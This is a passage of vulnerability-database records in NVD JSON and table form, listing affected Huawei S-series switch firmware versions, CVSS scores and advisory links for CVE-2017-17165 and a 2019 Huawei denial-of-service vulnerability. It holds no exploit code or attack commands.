                     matchCriteriaId: "79FA2FDA-DB2D-47D9-8017-0E5D4EC8D620",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2300_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "A40EFA43-E71F-464D-829C-8D4C60A57765",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2300_firmware:v200r009c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "C946DD64-C69E-4806-850C-D956D96CDE08",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s2300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "17566603-275F-4E6B-B5D9-4A716EEC03DC",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s2700_firmware:v200r005c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "AED7DFC5-846F-4F90-91A8-13E9E805C9CF",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2700_firmware:v200r006c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "193FCE7A-C793-446B-9C39-20597FA7BC70",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2700_firmware:v200r007c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "E364889D-CDEE-4D8C-82E5-6D5BC3DD768A",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2700_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "FB8FC67E-DFD3-482E-B7D6-17464885B8DC",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2700_firmware:v200r009c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "B6F69BC3-E6C0-4E70-AC13-D79D840579DB",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s2700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "DD2CD071-58E4-4061-8217-990453213470",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r003c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "FD601FFF-E623-4ADC-B286-D11B8004D7CF",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r003c00spc300t:*:*:*:*:*:*:*",
                     matchCriteriaId: "6BED3B4C-4656-4676-97BE-EE5012F73FE8",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r003c00spc600:*:*:*:*:*:*:*",
                     matchCriteriaId: "922D09A3-AC4E-4CAE-8737-5E3A8EB4F269",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r003c02:*:*:*:*:*:*:*",
                     matchCriteriaId: "2D5A6744-9B7F-4FF4-BE1B-AB6E6249ECE3",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r005c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "5EAEF900-7C8C-4569-B74B-A802F951CC47",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r005c01:*:*:*:*:*:*:*",
                     matchCriteriaId: "EB2B09C5-81F1-48B4-940D-6DFD06200139",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r005c02:*:*:*:*:*:*:*",
                     matchCriteriaId: "EDC356D3-F015-46A0-8F7A-1C594F19535B",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r005c03:*:*:*:*:*:*:*",
                     matchCriteriaId: "4676DD73-3F04-4327-842A-1FCB6CB7650D",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r005c05:*:*:*:*:*:*:*",
                     matchCriteriaId: "54E6A13C-2E5B-4130-BD37-5521852AFEB9",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r006c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "58C2E728-E8F2-461D-A069-4BEC88B94FD0",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r007c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "FD6B13D4-07F3-4CB5-8194-89781E685A78",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "5454BC21-A04F-4B3D-8533-2414B6E1BC8C",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r009c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "7F31814D-5879-4FB9-BDAE-01CFC75D9AF4",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s5300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "2CFEF08E-54C5-4D60-AFF0-37B00D6E2DDD",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r003c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "4907FBB8-5157-460D-9240-DD7D610C0FCC",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r003c00spc316t:*:*:*:*:*:*:*",
                     matchCriteriaId: "17B32A0A-E35B-438E-A666-54700EF2ED69",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r003c00spc600:*:*:*:*:*:*:*",
                     matchCriteriaId: "7D6F9128-F253-4EAC-84B1-93DC8F40C3F7",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r003c02:*:*:*:*:*:*:*",
                     matchCriteriaId: "2898D6C5-77AB-4C1F-8134-B2DBD13EDB81",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r005c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "DCF23DAE-1215-41B2-88C5-4436D846266C",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r005c01:*:*:*:*:*:*:*",
                     matchCriteriaId: "F64CA8E2-AF04-42B3-8E26-2EF379703B1F",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r005c02:*:*:*:*:*:*:*",
                     matchCriteriaId: "CB33B908-085C-43C6-B8B7-25BBF3614C9E",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r005c03:*:*:*:*:*:*:*",
                     matchCriteriaId: "5B18ABC1-A970-472A-A8BF-934D1180930E",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r006c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "5973A534-F961-4A97-B20E-994BA28AFE29",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r007c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "40745A01-E5AC-4207-A34F-D8E7F7231F83",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "21FFF548-FBEF-468A-A8DE-1DB1B7C0B3AF",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r009c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "48B5A9B7-A931-4806-8AC7-302C6CA49CF1",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s5700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "E22D3CFF-3353-4EE2-8933-84F395469D0D",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s600-e_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "299234CD-AD78-4C53-8B7E-C0B22681ADB2",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s600-e_firmware:v200r009c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "F40ADCF0-4FE9-492E-B34A-69BEF6DEAFE5",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s600-e:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "3E02D610-AB78-476B-9049-FDB66D9E9907",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v200r003c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "5C330A14-C941-4B28-AA9C-B78A96A9011D",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v200r005c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "C6818ECD-730B-40D6-9108-B8540CC4BF1E",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v200r007c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "D5811970-FE82-4888-A01D-B356B5578296",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "939C73D9-E0E9-47A5-970E-6C84F5ECD2D7",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v200r009c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "B39BBA0F-8EB9-40BA-B8DF-5C735F2216A3",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s6300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "AA3C8988-A1FC-4B04-9134-F2BDDADEAFB5",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r003c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "749B68B9-9F62-4E7A-AC86-F4073BA32E18",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r005c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "F18D9776-5CE7-4DD3-9119-7FB08A35B955",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r005c01:*:*:*:*:*:*:*",
                     matchCriteriaId: "F4979AA8-0D8E-4F37-A7DC-709BE4821D51",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r005c02:*:*:*:*:*:*:*",
                     matchCriteriaId: "898AC16A-8F4E-4709-A3B4-DE74FFB91130",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r007c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "FF4AF711-D921-4261-A459-2A0780EA951F",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "8DA5CF67-A58B-4666-B87E-712507233453",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r009c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "A9EA93B5-01A5-4506-9B0A-993621E6940E",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s6700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "DA7AC10D-B0DD-4206-8642-134DDD585C06",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "IPv6 function in Huawei Quidway S2700 V200R003C00SPC300, Quidway S5300 V200R003C00SPC300, Quidway S5700 V200R003C00SPC300, S2300 V200R003C00, V200R003C00SPC300T, V200R005C00, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S2700 V200R005C00, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S5300 V200R003C00, V200R003C00SPC300T, V200R003C00SPC600, V200R003C02, V200R005C00, V200R005C01, V200R005C02, V200R005C03, V200R005C05, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S5700 V200R003C00, V200R003C00SPC316T, V200R003C00SPC600, V200R003C02, V200R005C00, V200R005C01, V200R005C02, V200R005C03, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S600-E V200R008C00, V200R009C00, S6300 V200R003C00, V200R005C00, V200R007C00, V200R008C00, V200R009C00, S6700 V200R003C00, V200R005C00, V200R005C01, V200R005C02, V200R007C00, V200R008C00, V200R009C00 has an out-of-bounds read vulnerability. An unauthenticated attacker may send crafted malformed IPv6 packets to the affected products. Due to insufficient verification of the packets, successful exploit will cause device to reset.",
      },
      {
         lang: "es",
         value: "La función IPv6 en Huawei Quidway S2700 V200R003C00SPC300, Quidway S5300 V200R003C00SPC300, Quidway S5700 V200R003C00SPC300, S2300 V200R003C00, V200R003C00SPC300T, V200R005C00, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S2700 V200R005C00, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S5300 V200R003C00, V200R003C00SPC300T, V200R003C00SPC600, V200R003C02, V200R005C00, V200R005C01, V200R005C02, V200R005C03, V200R005C05, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S5700 V200R003C00, V200R003C00SPC316T, V200R003C00SPC600, V200R003C02, V200R005C00, V200R005C01, V200R005C02, V200R005C03, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S600-E V200R008C00, V200R009C00, S6300 V200R003C00, V200R005C00, V200R007C00, V200R008C00, V200R009C00, S6700 V200R003C00, V200R005C00, V200R005C01, V200R005C02, V200R007C00, V200R008C00 y V200R009C00 tiene una vulnerabilidad de lectura fuera de límites. Un atacante no autenticado podría enviar paquetes mal formados IPv6 manipulados a los productos afectados. Dada la verificación insuficiente de los paquetes, una explotación exitosa podría hacer que el dispositivo se reinicie.",
      },
   ],
   id: "CVE-2017-17165",
   lastModified: "2024-11-21T03:17:37.673",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "HIGH",
            cvssData: {
               accessComplexity: "LOW",
               accessVector: "NETWORK",
               authentication: "NONE",
               availabilityImpact: "COMPLETE",
               baseScore: 7.8,
               confidentialityImpact: "NONE",
               integrityImpact: "NONE",
               vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:C",
               version: "2.0",
            },
            exploitabilityScore: 10,
            impactScore: 6.9,
            obtainAllPrivilege: false,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
      cvssMetricV30: [
         {
            cvssData: {
               attackComplexity: "LOW",
               attackVector: "NETWORK",
               availabilityImpact: "HIGH",
               baseScore: 7.5,
               baseSeverity: "HIGH",
               confidentialityImpact: "NONE",
               integrityImpact: "NONE",
               privilegesRequired: "NONE",
               scope: "UNCHANGED",
               userInteraction: "NONE",
               vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
               version: "3.0",
            },
            exploitabilityScore: 3.9,
            impactScore: 3.6,
            source: "nvd@nist.gov",
            type: "Primary",
         },
      ],
   },
   published: "2018-02-15T16:29:02.250",
   references: [
      {
         source: "psirt@huawei.com",
         tags: [
            "Vendor Advisory",
         ],
         url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20171213-02-ipv6-en",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Vendor Advisory",
         ],
         url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20171213-02-ipv6-en",
      },
   ],
   sourceIdentifier: "psirt@huawei.com",
   vulnStatus: "Modified",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "CWE-125",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

Vulnerability from fkie_nvd
Published
2019-06-04 19:29
Modified
2024-11-21 04:44
Summary
Some Huawei S series switches have a DoS vulnerability. An unauthenticated remote attacker can send crafted packets to the affected device to exploit this vulnerability. Due to insufficient verification of the packets, successful exploitation may cause the device reboot and denial of service (DoS) condition. (Vulnerability ID: HWPSIRT-2019-03109)
Impacted products
Vendor Product Version
huawei s12700_firmware v200r005c00
huawei s12700_firmware v200r006c00
huawei s12700_firmware v200r007c00
huawei s12700_firmware v200r008c00
huawei s12700_firmware v200r010c00
huawei s12700_firmware v200r011c10
huawei s12700_firmware v200r012c00
huawei s12700_firmware v200r013c00
huawei s12700 -
huawei s1700_firmware v200r008c00
huawei s1700_firmware v200r009c00
huawei s1700_firmware v200r010c00
huawei s1700_firmware v200r011c10
huawei s1700_firmware v200r012c00
huawei s1700_firmware v200r013c00
huawei s1700 -
huawei s2300_firmware v200r003c00
huawei s2300_firmware v200r005c00
huawei s2300_firmware v200r008c00
huawei s2300_firmware v200r010c00
huawei s2300_firmware v200r011c10
huawei s2300_firmware v200r012c00
huawei s2300_firmware v200r013c00
huawei s2300 -
huawei s2700_firmware v200r005c00
huawei s2700_firmware v200r006c00
huawei s2700_firmware v200r007c00
huawei s2700_firmware v200r008c00
huawei s2700_firmware v200r010c00
huawei s2700_firmware v200r011c10
huawei s2700_firmware v200r012c00
huawei s2700_firmware v200r013c00
huawei s2700 -
huawei s5300_firmware v200r003c00
huawei s5300_firmware v200r005c00
huawei s5300_firmware v200r008c00
huawei s5300_firmware v200r010c00
huawei s5300_firmware v200r011c10
huawei s5300_firmware v200r012c00
huawei s5300_firmware v200r013c00
huawei s5300 -
huawei s5700_firmware v200r003c00
huawei s5700_firmware v200r005c00
huawei s5700_firmware v200r006c00
huawei s5700_firmware v200r007c00
huawei s5700_firmware v200r008c00
huawei s5700_firmware v200r010c00
huawei s5700_firmware v200r011c10
huawei s5700_firmware v200r012c00
huawei s5700_firmware v200r013c00
huawei s5700 -
huawei s600-e_firmware v200r008c00
huawei s600-e_firmware v200r010c00
huawei s600-e_firmware v200r011c10
huawei s600-e_firmware v200r012c00
huawei s600-e_firmware v200r013c00
huawei s600-e -
huawei s6300_firmware v200r003c00
huawei s6300_firmware v200r005c00
huawei s6300_firmware v200r007c00
huawei s6300_firmware v200r008c00
huawei s6300_firmware v200r010c00
huawei s6300_firmware v200r011c10
huawei s6300_firmware v200r012c00
huawei s6300_firmware v200r013c00
huawei s6300 -
huawei s6700_firmware v200r003c00
huawei s6700_firmware v200r005c00
huawei s6700_firmware v200r007c00
huawei s6700_firmware v200r008c00
huawei s6700_firmware v200r010c00
huawei s6700_firmware v200r011c10
huawei s6700_firmware v200r012c00
huawei s6700_firmware v200r013c00
huawei s6700 *
huawei s7700_firmware v200r003c00
huawei s7700_firmware v200r005c00
huawei s7700_firmware v200r006c00
huawei s7700_firmware v200r007c00
huawei s7700_firmware v200r008c00
huawei s7700_firmware v200r010c00
huawei s7700_firmware v200r011c10
huawei s7700_firmware v200r012c00
huawei s7700_firmware v200r013c00
huawei s7700 -
huawei s7900_firmware v200r011c10
huawei s7900_firmware v200r012c00
huawei s7900_firmware v200r013c00
huawei s7900 -
huawei s9300_firmware v200r003c00
huawei s9300_firmware v200r008c00
huawei s9300_firmware v200r008c10
huawei s9300_firmware v200r010c00
huawei s9300_firmware v200r011c10
huawei s9300_firmware v200r012c00
huawei s9300_firmware v200r013c00
huawei s9300 -
huawei s9300x_firmware v200r010c00
huawei s9300x_firmware v200r011c10
huawei s9300x_firmware v200r012c00
huawei s9300x_firmware v200r013c00
huawei s9300x -
huawei s9700_firmware v200r003c00
huawei s9700_firmware v200r005c00
huawei s9700_firmware v200r006c00
huawei s9700_firmware v200r007c00
huawei s9700_firmware v200r008c00
huawei s9700_firmware v200r010c00
huawei s9700_firmware v200r011c10
huawei s9700_firmware v200r012c00
huawei s9700_firmware v200r013c00
huawei s9700 -



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s12700_firmware:v200r005c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "7D81469B-EC6C-493D-B632-4DF821A1F304",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s12700_firmware:v200r006c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "D6F2C4C7-3438-42B8-8999-C17E45C8CF49",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s12700_firmware:v200r007c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "10CBC93B-5CF6-45BF-A90A-84B7693E27FD",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s12700_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "BD4C5CC9-FD60-4C64-8F88-CFC71BBEA663",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s12700_firmware:v200r010c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "933755CC-4A0B-42FB-9491-3C841059851D",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s12700_firmware:v200r011c10:*:*:*:*:*:*:*",
                     matchCriteriaId: "2D6FF612-2F2B-4B75-8D97-86205DFCF0CF",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s12700_firmware:v200r012c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "CDC385D3-E82B-454B-A131-971F3B830EC9",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s12700_firmware:v200r013c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "33014F41-7B1B-4294-A862-45E2669AAAB3",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s12700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "138C1E57-176C-46B1-9704-D9C8391CC802",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s1700_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "5A3B7337-72AF-409A-9103-451622FB89AC",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s1700_firmware:v200r009c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "F91DC34F-C000-4E51-A70E-38610D31AE53",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s1700_firmware:v200r010c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "099E36B0-125F-4B3F-8D4A-01F8882CF53B",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s1700_firmware:v200r011c10:*:*:*:*:*:*:*",
                     matchCriteriaId: "342E032C-BAE5-4F15-8BAE-84F9D9AA58D0",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s1700_firmware:v200r012c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "BC439F55-11AB-42D2-B891-C6C5D62FF5F0",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s1700_firmware:v200r013c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "D5EEEAA3-B534-48B7-ABBC-0E1BF3C0AC68",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s1700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "22FE26B5-C6D6-4A6C-8526-ED94F4F57C2C",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s2300_firmware:v200r003c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "1C6CC00C-1056-426B-9828-1A886F2C8D41",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2300_firmware:v200r005c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "F1C82DA6-8D95-45D2-B54C-CFE1AA9CC1F1",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2300_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "A40EFA43-E71F-464D-829C-8D4C60A57765",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2300_firmware:v200r010c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "1116C5A3-35F7-48A2-A68F-E299D0EA12F8",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2300_firmware:v200r011c10:*:*:*:*:*:*:*",
                     matchCriteriaId: "CD500740-A674-4B68-8AFA-26991B82AD2A",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2300_firmware:v200r012c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "3EDD6B48-17E7-4B2D-B86D-654B059A57B8",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2300_firmware:v200r013c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "E6D6A2FA-2ABE-41B3-BEF3-E835D6868E1F",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s2300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "17566603-275F-4E6B-B5D9-4A716EEC03DC",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s2700_firmware:v200r005c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "AED7DFC5-846F-4F90-91A8-13E9E805C9CF",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2700_firmware:v200r006c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "193FCE7A-C793-446B-9C39-20597FA7BC70",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2700_firmware:v200r007c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "E364889D-CDEE-4D8C-82E5-6D5BC3DD768A",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2700_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "FB8FC67E-DFD3-482E-B7D6-17464885B8DC",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2700_firmware:v200r010c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "5561195B-7385-4175-9D29-77E95E4E9AB6",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2700_firmware:v200r011c10:*:*:*:*:*:*:*",
                     matchCriteriaId: "20648023-4CC5-4606-BE8E-70A5C20D7BE6",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2700_firmware:v200r012c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "1449504A-662C-403C-85AF-CCB5219CE976",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2700_firmware:v200r013c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "AC3443AF-478E-4043-9E72-5BBC0C88F13D",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s2700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "DD2CD071-58E4-4061-8217-990453213470",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r003c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "FD601FFF-E623-4ADC-B286-D11B8004D7CF",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r005c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "5EAEF900-7C8C-4569-B74B-A802F951CC47",
                     vulnerable: true,
                  },
                  {
